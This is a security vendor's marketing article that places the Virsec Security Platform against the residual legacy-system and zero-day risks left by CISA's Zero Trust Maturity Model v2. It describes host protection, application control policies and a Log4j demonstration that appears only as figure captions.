In April 2023, CISA released Zero Trust Maturity Model Version 2, which added a fourth security maturity level and reaffirmed application and workload cyber requirements.
In this article we consider Application Threat Protections security levels within the Applications and Workloads pillar, and the additional mitigation required for residual risk. We will also supply a solution to address those residual risks.
Here are the new maturity levels for Threat Protections within the Applications and Workloads Pillar.
Table 1: Application and Workload: Threat Protections
Maturity Factor | Traditional | Initial | Advanced | Optimal |
---|---|---|---|---|
App Workflow Integration | Minimal Integration | Basic Integration (mission critical apps) | Complete integration (all apps) | Dynamic Integration (all apps) |
Threat scope |
|
|
|
|
Residual Risks | 1) Legacy – Unsupported Hardware, Software, OS’s 2) Zero Day Attacks |
In moving through the maturity levels (left to right in the Application and Workload: Threat Protections table above) your agency will reduce its risk with an ever-shrinking risk residual to your applications and workloads.
However, there are still two residual risk scenarios, regardless of the level of maturity the agency reaches: Legacy systems and Zero-Day attacks.
Legacy Systems
Legacy systems–in this article’s context–refer to systems that cannot move through the maturity model due to lack of support. Legacy systems examples include Windows 2003, Windows 2008 R2, and Microsoft Exchange 2013.
Traditional endpoint security (EDR/MDR/XDRs) relies on post-incident detect and respond, are challenged to stop zero-day persistent threats. These attacks often pin-down agencies with tough decisions/responses, such as turning off compromised services during an attack to block the active threat.
Agencies may have these legacy systems deployed. Over time, bad actors find and exploit the legacy systems based on no supported mitigations from the product or security vendors. Adversaries also create new risk by finding new vulnerabilities in legacy systems.
Legacy systems’ endpoint risks can often be mitigated with technical compensating controls such as inline Intrusion Protection Systems (IPS) placed in front of the legacy systems. IPS is highly effective against vulnerabilities with known signatures and scales across multiple endpoints, but IPS relies on signature-based identification—leaving the host susceptible to Zero-Day attacks.
Zero-Day Attacks
Zero-Day attacks are vulnerabilities that are currently unknown and thus do not have a pattern (signature) to match the tactics and techniques exploited by bad actors.
Enter Virsec
Virsec, a T-Rex partner, stands in the gap between Zero Trust functions and Zero-Day attacks. By protecting apps and workloads from unknown attacks, as shown below, Virsec completes the Zero-Day architecture.
Figure 1: Enter Virsec: Zero Trust Security Posture
Virsec Security Platform (VSP)
The Virsec Security Platform supports Zero Trust 2.0 Application and Workload protection. The support comes in the form of a complementary Zero Trust approach as shown in the VSP Protection Engines shown below:
Figure 2: Virsec Security Platform (VSP)
Host Protection
The security engineer manages the host protection capabilities through two tabs in the VSP web interface: host protection and application control policies (ACP) as shown here:
Figure 3: Virsec Menu
The Host Protection table (shown below) allows the security engineer to curate and refine the Allowlist, as well as apply application control policies. VSP also supports three states for each endpoint: Disabled, Protect, and Detect (Detect highlighted in blue) allowing granular control for change control and acceptance during Zero Trust projects.
Figure 4: Compliant Caption : Host Protection Table
App Control Policies
In addition to the host protections shown in the Host Protection Table (above), the host protections also support OS based application-level protections. The following screenshot shows one Linux and two Windows App Control Policies (ACPs). The security engineer may apply ACPs at the same time as Host Protections or later to limit the amount of change during deployments.
The following screenshot gives an example of one Linux and two Windows ACPs:
Figure 5: Linux and Windows ACP
For a complete list of supported Operating Systems, please refer to VSP2.8_CompatibilityGuide.pdf (virsec.com)
VSP ships with a variety of ACPs, but to get a feeling for its functionality, one of the default Application Control Policy (ACP) templates out-of-the-box is for Linux Systems with a strict match for protection of the native Linux route command is shown here:
Figure 6: Default ACP
Call Out: Commands such as route, arp, ping, ifconfig have valid use by cyber and system staff, but they are also ideal tools for hackers to use as discovery when seeking targets.
Additional VSP Application Protections
VSP’s Application Protection supplies added Zero Trust Application Protection (ZTAP) by automatically instrumenting the application workflow for multi-layer in-line monitoring through the application stack. For example, the TomCat/Java stack has multiple sectors and surfaces for attack. VSP enables protection across those sectors and here is an example protection stack screenshot from the VSP console.
Figure 7: Additional VSP Protections (Vulnerability Protection)
Additional VSP Application Protections
This section covers VSP in action for a Zero-Day attack. The example scenario is using Kali Linux and a Log4J attack against a Windows 2012 host. This example covers both scenarios of Zero-Day attack and Legacy as the host does not have a supported malware/end point protection stack available. (This is a chicken and egg issue to simulate a Zero-Day attack realistically with no hosts protections created since Log4j has been mitigated.)
The following diagram shows how VSP stops Log4J, at multiple stages of the attack.
Figure 8: Virsec Security Platform (VSP) – Applied Security Compensating Controls to Log4j
Here is the Host Protection policy for the victim (attacked) host:
Figure 9: Host Protection policy for the attacked host
For Application and Workload protections, VSP protects at the host level and the web application level.
The incident log for VSP protecting the victim is shown here:
Figure 10: Incident Log for VSP
The hacker would then experience the following output from the Log4j attack attempt.
Figure 11: Hacker Output Screen
Summary
The CISA Zero Trust 2.0 Maturity Model increases granularity in the model; however, addressing the inherent issues of Zero-Day exploits and legacy issues with unpatched vulnerabilities require added solutions and innovation. The Virsec Security Platform (VSP) is a strong solution to fill the gap for Zero-Day attacks and close the widening gap on securing legacy systems through its built-in capabilities: stopping Zero-Day attacks, ensuring zero dwell time, and continuous run-time protection.
T-Rex’s cybersecurity engineers and architects work with Federal agencies to speed their Zero Trust endeavors through T-Rex’s Zero Trust Accelerator and innovative tooling as shown here. Contact us at cybersecurity@trexsolutionsllc.com to discuss how we can assist in your Zero Trust program.